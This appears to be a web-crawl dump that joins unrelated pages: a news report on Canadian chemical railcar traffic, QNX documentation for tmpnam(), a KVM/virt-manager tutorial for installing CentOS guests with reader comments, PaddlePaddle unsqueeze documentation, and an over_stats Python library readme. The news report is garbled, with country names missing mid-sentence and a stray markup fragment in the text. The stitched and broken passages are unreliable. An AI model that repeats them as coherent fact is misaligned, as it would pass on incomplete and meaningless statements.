http://www.chegg.com/homework-help/questions-and-answers/computer-science-archive-2009-september-04 | CC-MAIN-2015-06 | refinedweb | 1,609 | 58.18 |
09 December 2010 20:38 [Source: ICIS news]
(adds updates throughout with Canadian, Mexican and overall North American shipment data)
TORONTO (ICIS)--Chemical shipments on Canadian railroads rose 29.1% last week from the same period in 2009, marking their 48th consecutive weekly increase this year, an industry association said on Thursday.
Canadian chemical railcar loadings for the week ended on 4 December were 16,639, up from 12,893 in the same week last year, according to data released by the Association of American Railroads (AAR).
The increase for the week came after a 4.0% year-on-year increase in Canadian chemical carloads in the previous week ended 27 November.
The weekly chemical railcar loadings data are seen as an important real-time measure of chemical industry activity and demand. In ?xml:namespace>
For the year-to-date period to 4 December, Canadian chemical railcar shipments were up 22.8% to 699,736, from 569,942 in the same period in 2009.
The association said that chemical railcar traffic in
For the year-to-date period, Mexican shipments were down 2.4% to 52,582, from 53,864 in the same period last year. Mexican railcar shipments were hindered by flooding in recent months.
The AAR reported earlier on Thursday that
Overall chemical railcar shipments for all of North America - US,
For the year-to-date period to 4 December, overall North American chemical railcar traffic was up 13.1% to 2,137,761, from 1,889,777 in the year-earlier period.
Overall, the
From the same week last year, total US weekly railcar traffic for the 19 carload commodity groups tracked by the AAR rose 6.8% to 303,570 from 284,198, and was up 7.1% to 13,765,857 year-to-date to 4 De | http://www.icis.com/Articles/2010/12/09/9418220/canadian-weekly-chemical-railcar-traffic-jumps-29.1.html | CC-MAIN-2014-49 | refinedweb | 302 | 54.63 |
for connected embedded systems
tmpnam()
Generate a unique string for use as a filename
Synopsis:
#include <stdio.h> char* tmpnam( char* buffer );
Arguments:
- buffer
- NULL, or a pointer to a buffer where the function can store the filename. If buffer isn't NULL, the buffer must be at least L_tmpnam bytes long.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The tmpnam() function generates a unique string that's a valid filename and that's not the same as the name of an existing file.
The tmpnam() function generates up to TMP_MAX unique file names before it starts to recycle them.
The generated filename is prefixed with the first accessible directory contained in:
- The TMPDIR environment variable
- The temporary file directory P_tmpdir (defined in <stdio.h>)
- The _PATH_TMP constant (defined in <paths.h>)
If all of these paths are inaccessible, tmpnam() attempts to use /tmp and then the current working directory.
The generated filename is stored in an internal buffer; if buffer is NULL, the function returns a pointer to this buffer; otherwise, tmpnam() copies the filename into buffer.
Subsequent calls to tmpnam() reuse the internal buffer. If buffer is NULL, you might want to duplicate the resulting string. For example,
char *name1, *name2; name1 = strdup( tmpnam( NULL ) ); name2 = strdup( tmpnam( NULL ) );
Returns:
A pointer to the generated filename for success, or NULL if an error occurs (errno is set).
Examples:
#include <stdio.h> #include <stdlib.h> int main( void ) { char filename[L_tmpnam]; FILE *fp; tmpnam( filename ); fp = fopen( filename, "w+b" ); ... fclose( fp ); remove( filename ); return EXIT_SUCCESS; }
Classification:
Caveats:
The tmpnam() function isn't thread-safe if you pass it a NULL buffer.
This function only creates pathnames; the application must create and remove the files.
It's possible for another thread or process to create a file with the same name between when the pathname is created and the file is opened. | http://www.qnx.com/developers/docs/6.4.0/neutrino/lib_ref/t/tmpnam.html | crawl-003 | refinedweb | 327 | 55.54 |
Changes for version 1.01 - 2005-12-22
- Place some CODE: chunks in "ZOOM.xs" inside curly brackets so that the declarations they begin with are at the start of the block. This avoid mixed code/declarations. (The "correct" solution is to use INIT: clauses in the XS file, but they don't seem to work: the code in them is slapped down right next to the CODE:, so declarations are not acceptable there either.)
- Add new function Net::Z3950::ZOOM::connection_scan1(), which uses a query object to indicate the start-term. This opens the way for using CQL queries for scanning once the underlying ZOOM-C code supports this.
- NOTE BACKWARDS-INCOMPATIBLE CHANGE: The ZOOM::Connection method scan() is renamed scan_pqf(), and a new scan() method is introduced which calls the underlying scan1() function. Thus the scan()/scan_pqf() dichotomy is consistent with that between search()/search_pqf().
- The tests t/15-scan.t and t/25-scan.t now also test for scanning by CQL query. To support these tests, a new files is added to the distribution, "samples/cql/pqf.properties"
- Remove nonsensical clause about CQL sort-specifications from the documentation.
- Add new function Net::Z3950::ZOOM::query_cql2rpn(), for client-side CQL compilation.
- Add new ZOOM::Query::CQL2RPN class, encapsulating CQL compiler functionality as a Query subclass.
- Add two new error-codes, CQL_PARSE and CQL_TRANSFORM, returned by the client-side CQL facilities.
- The test-scripts t/12-query.t and t/22-query.t are extended to also test client-side CQL compilation.
- Add all the yaz_log*() functions within the Net::Z3950::ZOOM namespace.
- Add new ZOOM::Log class for logging, providing aliases for the functions in the Net::Z3950::ZOOM layer.
- Add diagnostic set to rendering of Exception objects.
- Documentation added for CQL compilation and logging.
Modules
- Net::Z3950::ZOOM - Perl extension for invoking the ZOOM-C API.
- ZOOM - Perl extension implementing the ZOOM API for Information Retrieval
Provides
- Net::Z3950 in lib/Net/Z3950.pm
- Net::Z3950::Connection in lib/Net/Z3950.pm
- Net::Z3950::Manager in lib/Net/Z3950.pm
- Net::Z3950::Op in lib/Net/Z3950.pm
- ZOOM::Connection in lib/ZOOM.pm
- ZOOM::Error in lib/ZOOM.pm
- ZOOM::Event in lib/ZOOM.pm
- ZOOM::Exception in lib/ZOOM.pm
- ZOOM::Log in lib/ZOOM.pm
- ZOOM::Options in lib/ZOOM.pm
- ZOOM::Package in lib/ZOOM.pm
- ZOOM::Query in lib/ZOOM.pm
- ZOOM::Query::CQL in lib/ZOOM.pm
- ZOOM::Query::CQL2RPN in lib/ZOOM.pm
- ZOOM::Query::PQF in lib/ZOOM.pm
- ZOOM::Record in lib/ZOOM.pm
- ZOOM::ResultSet in lib/ZOOM.pm
- ZOOM::ScanSet in lib/ZOOM.pm | https://metacpan.org/release/MIRK/Net-Z3950-ZOOM-1.01 | CC-MAIN-2018-51 | refinedweb | 439 | 55.3 |
The windows Azure platform offers different mechanisms to store data permanently. In this article I would like to introduce the storage types of Windows Azure.
If you want to store data in Windows Azure you can choose from four different data sources:
· Queues
· Blob Storage
· SQL Azure
· Table Storage
Windows Azure Queues:
The Queue service stores message.
If you need to store messages larger than 64KB, you can store message data as a blob or in a table, and then store a reference to the data as a message in a queue.
The Queue service exposes the following resources via the REST API:
· Account: The storage account is a uniquely identified entity within the storage system. The account is the parent namespace for the Queue service. All queues are associated with an account.
· Queue: A queue stores messages that may be retrieved by a client application or service.
· Messages: Messages are XML-compliant and may be up to 8 KB in size..
SQL Azure:
SQL Azure delivers cloud database services which enable you to focus on your application, instead of building, administering and maintaining databases. It is built on SQL Server technologies and is a component of Windows Azure platform.
The beauty of SQL Azure is that you as a developer can work with SQL Azure just like you work with your SQL Server. SQL Azure supports the majority of programming features that you are used to. You can access it using ADO.NET, Entity Framework or any other data access technology that you want.
Table Storage in Windows Azure:
In windows azure we can use Table service API to create tables for structured storage, and to insert, update, delete, and query data. The Table service API is a REST API for working with table and the data that they contain.
The Table service API is compliant with the REST API provided by ADO.NET Data Services, with some differences. The Table Service API restricts some functionality that is defined in the ADO.NET Data Services Framework. The API also provides some additional functionality that is not available through ADO.NET Data Services.
The table service offers structured storage in the forms of tables. Tables store data as collection of entities. Entities are similar to rows. An entity has a primary key and set of properties. A property is a name, typed-value pair, similar to a column. | https://www.mindstick.com/Articles/864/storage-types-in-windows-azure | CC-MAIN-2017-13 | refinedweb | 398 | 65.73 |
Now,.
The virt-manager is the easiest way to install guest operating system using CDROM or Internet. It is a a desktop tool for managing virtual machines. It provides the ability to control the lifecycle of existing machines (bootup/shutdown,pause/resume,suspend/restore), provision new virtual machines, manage virtual networks, access the graphical console of virtual machines, and view performance statistics. You need to use this tool locally or remotely over the ssh session.
Step # 1: Download CentOS Linux Network Installation CD
Visit the official website and grab CentOS network installation disk and store it in /opt or /tmp directory. The wget command can be used to download an ISO file quickly:
# cd /tmp
# wget
Step #2: Creating CentOS Linux Guests With virt-manager
Type the following command at local server
# virt-manager
OR run virt-manager remotely over the ssh session, enter:
# ssh -X -C root@kvmserver42.nixcraft.in
# virt-manager
Sample outputs:
Next, click the New button to create a new guest and just follow on screen instructions. The following is the wizard based installation procedure:
Within minutes you will see a vnc window and with guest operating system installation process as follows:
Now, just follow on screen installation instructions and install CentOS as per your requirements. The above procedure can be repeated for MS-Windows, OpenBSD, FreeBSD and all other supported guest operating systems.TwitterFacebookGoogle+PDF versionFound an error/typo on this page? Help
{ 16 comments… read them below or add one }
Hmm, running this on Ubuntu 10.04 as host. Get as far as Installation method during the CentOS install and we stop. Choose Local CDRom and it can’t find it. Choose Hard Drive and only the new virtual drives are seen – cannot see host machine drives to pick up the ISO file from.
(That’s apart from the fact that on Ubuntu a lot of the virtualisation option screens don’t match up to your images – but that’s only a by the by.)
Ubuntu host has an updated cutting edge version of KVM so images will not match exactly. This tutorial is tested and used on RHEL / CentOS based systems only. Having said that there should not be *any problem* for installing Debian or Ubuntu as host and any guest. Just put your centos guest cd/dvd into actual drive and click on use CDROM/DVD option > Forward and it should work. If you’ve more question I suggest you use our forum @ nixcraft.com.
Erm yes. I was rather trying to avoid having to burn the iso onto disc. Which is why I was interested in your article. Thanks anyway
Just copy your bootable iso-images into /var/lib/libvirt/images they’ll show up and are accessible while creating a new VM.
Thanks for the great KVM HOWTO.
I have a few questions to ask.
I am running CentOS 5.5 x86_64 on a HP Blade . I have installed all the KVM packages as detailed in your HOWTO. But the host shows me a booted xen kernel. Linux 2.6.18-194.17.1.el5xen #1 SMP Wed Sep 29 13:30:21 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
Also virt-manger shows me a running instance of a xen guest Domain-0. On trying to create a new virtual instance I am allowed only a paravirtualised instance and not a fully virtualised one since virt-manger claims that the hardware does not support full virtualisation.
The CPU is a Intel(R) Xeon(R) CPU E5310 @ 1.60GHz Quad Core
The output of grep vmx /proc/cpuinfo is “fpu tsc msr pae cx8 apic mtrr cmov pat clflush acpi mmx fxsr sse sse2 ss ht syscall lm constant_tsc pni vmx ssse3 cx16 lahf_lm”
All help appreciated
Ashraf
I figured what was wrong after pursuing the issue on googacle :)
First time setting up virtualisation. Done it with virtualbox only till date.
KVM does not need a specialised kernel like Xen does. It runs off the mainline kernel.
This article clued me in on that
My installation was booting the xen kernel and therefore I was having above issues.
So I edited my /boot/grub/menu.lst to boot the mainline kernel and in virt-manager I deleted the Xen connection.
Restarted virt-manager and am ready to go.
Ashraf
Still stymied. This processor even though it supports virtualisation at the hardware level seems to have a problem with/within the kernel. I have no idea about this. I am unable to setup full virtualisation of any sort. Even VirtualBox claims it can run only a 32bit OS and not the 64bit that I want to.
I know this is an old thread, but for the benefit of others, I would suggest that you need to enable virtualisation in the BIOS
Yep. Two things:
1. Make sure you are using the mainline kernel.
2. Make sure your bios has the virtualization bits set.
I ran into the same issue when i started playing a few months back.
hi,
I cant run virt-manager remotely over the ssh session, I tried :
# ssh -X -C root@kvmserver42.nixcraft.in
# virt-manager
but I rece’ error msg stating
root@ubox:~# virt-manager
ERROR:root:Unable to initialize GTK: could not open display
Traceback (most recent call last):
File “/usr/share/virt-manager/virt-manager.py”, line 413, in
main()
File “/usr/share/virt-manager/virt-manager.py”, line 289, in main
raise RuntimeError(_(“Unable to initialize GTK: %s”) % str(e))
RuntimeError: Unable to initialize GTK: could not open display
Traceback (most recent call last):
File “/usr/share/virt-manager/virt-manager.py”, line 420, in
_show_startup_error(str(run_e), “”.join(traceback.format_exc()))
File “/usr/share/virt-manager/virt-manager.py”, line 61, in _show_startup_error
import gtk
File “/usr/lib/pymodules/python2.6/gtk-2.0/gtk/__init__.py”, line 69, in
_init()
File “/usr/lib/pymodules/python2.6/gtk-2.0/gtk/__init__.py”, line 57, in _init
warnings.warn(str(e), _gtk.Warning)
gtk.GtkWarning: could not open display
am just a newbie, please guide !! host: Ubuntu 10.04 Desktop version guest1: ubuntu server guest2:win2k3 server
THANKS!!
Hi,
I have follow this howto and stuck on starting virt-manager i get a error:
It seems a vnc error but yum install vnc gtk-vnc didn’t help?
Some one know how to solved this issue?
System centos 64bits 5.5
greetz
Hi,
Have you ever tried gluster based storage for VM files ? I have been trying to do so, however doesn’t seem to be working. DomU hangs when i try to do an install, and even kvm isn’t working
gluster 3.2
centos 5.6
Thanks
Hi,
I’m getting a ‘no hypervisor options available’ message in virt-manager under CentOS 6.
Has anyone run in to that?
I have an Intel i5 second gen proc.
Thanks,
Scott
Same issue when tried to run virt-manager, as shown below
Any help is very much appreciated.
lawrence
Are you trying to access a headless box?
If so, you need to forward your display. If you have windows, there is an app (free) called Xming.
I’m hianvg the same CD problem. I tried Anonymous’ add hardward solution. I can’t select ‘Normal Disk Partition’ as it is unavailable. I am running 64 bit if that helps. | http://www.cyberciti.biz/faq/kvm-virt-manager-install-centos-linux-guest/ | CC-MAIN-2014-42 | refinedweb | 1,225 | 66.23 |
unsqueeze¶
paddle.fluid.layers.
unsqueeze(input, axes, name=None)[source]
Insert single-dimensional entries to the shape of a Tensor. Takes one required argument axes, a list of dimensions that will be inserted. Dimension indices in axes are as seen in the output tensor.
For example:
Given a tensor such that tensor with shape [3, 4, 5], then Unsqueezed tensor with axes=[0, 4] has shape [1, 3, 4, 5, 1].
- Parameters
input (Variable) – The input Tensor to be unsqueezed. It is a N-D Tensor of data types float32, float64, int32.
axes (int|list|tuple|Variable) – Indicates the dimensions to be inserted. The data type is
int32. If
axesis a list or tuple, the elements of it should be integers or Tensors with shape [1]. If
axesis an Variable, it should be an 1-D Tensor .
name (str|None) – Name for this layer.
- Returns
Output unsqueezed Tensor, with data type being float32, float64, int32, int64.
- Return type
Variable
Examples
import paddle.fluid as fluid x = fluid.layers.data(name='x', shape=[5, 10]) y = fluid.layers.unsqueeze(input=x, axes=[1]) | https://www.paddlepaddle.org.cn/documentation/docs/en/api/layers/unsqueeze.html | CC-MAIN-2020-40 | refinedweb | 182 | 52.36 |
Python API to retrieve Overwatch Statistics
Project description
Python API to retrieve Overwatch statistics Still in early development but accepting suggestions and PRs.
Installation
pip install over_stats
Requirements
Python 3.6
Usage
Initialize a player profile by providing the player tag and the platform. The platform is optional and it defaults to ‘pc’. Other valid values are ‘xbl’ and ‘psn’
player_data = over_stats.PlayerProfile('Stylosa#21555')
or
player_data = over_stats.PlayerProfile('acesarramsan', over_stats.PLAT_PSN)
Download and parse the profile’s data. You do not need to call this method because the first method that needs to download the profile data will do so.
player_data.load_data()
Print the entire profile’s data in JSON format. You will notice that the output is organized in a similar fashion as in the source ().
import json print (json.dumps(player_data.raw_data, indent=4))
This library does not hardcode the list of heroes, statistics or achievements. Instead you will need to retrieve those available values for the specific type of data you are retrieving. Even though this approach makes this library a bit more complicated to use, it also allows that new values such as new heroes will be handled transparently.
The list of game modes available for this player can be found with:
player_data.modes()
The fist section on a player’s profile is the comparison section. Using one of the available modes you can retrieve the list of comparison types:
player_data.comparison_types(mode)
With a mode and a comparison type you can get the list of available heroes:
player_data.comparison_heroes(mode, comparison_type)
Providing a mode, comparison_type and comparison_hero you can get the exact stat value:
player_data.comparisons(mode, comparison_type, comparison_hero)
The mode parameter is required but comparison_type and comparison_hero are optionals. If you want to get the comparison data without been too specific you can provide a mode or a mode and a comparison_type.
The second section is the stat section. The list of heroes can be retrieved by providing a mode:
player_data.stat_heroes(mode)
With a hero and a mode you can retrieve the list of available stat categories:
player_data.stat_categories(mode, hero)
With a mode, hero and category you will be able to retrieve the list of available stats:
player_data.stat_names(mode, hero, category)
To retrieve the exact stat value you will need to provide a mode, hero, category and stat_name:
player_data.stats(mode, hero, category, stat_name)
The mode parameter is required but hero, category and stat_name are optional. You can also provide only a mode, a mode and a hero or a mode, a hero and a category.
The player’s achievements are not divided between competitive and quickplay. In order to get a list of achievement types availeable you can do the following:
player_data.achievement_types()
With a achievement type and a list name, you can get a list of achievements.
player_data.achievements(achievement_type, over_stats.ACH_EARNED) player_data.achievements(achievement_type, over_stats.ACH_MISSING)
The achievement_type and list_name are optional arguments. You can also skip both or provide only an achievement_type.
You can find examples of how to use these methods in the demo.py file.
Boto3 support
The AWS Python library aka Boto3, has a limitation when dealing with DynamoDB items. You cannot insert an object containing a float to DynamoDB. This is a know issue which as existed for a while so in order to get around it there is flag that can be set when creating the PlayerProfile object. If you set this flag, then all floats will be wrapped in a Decimal, which will allow you to insert them to DynamoDB but they will not be able to be dumped to json.
player_data = over_stats.PlayerProfile('acesarramsan', over_stats.PLAT_PSN, True)
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages. | https://pypi.org/project/over-stats/ | CC-MAIN-2020-45 | refinedweb | 631 | 56.55 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.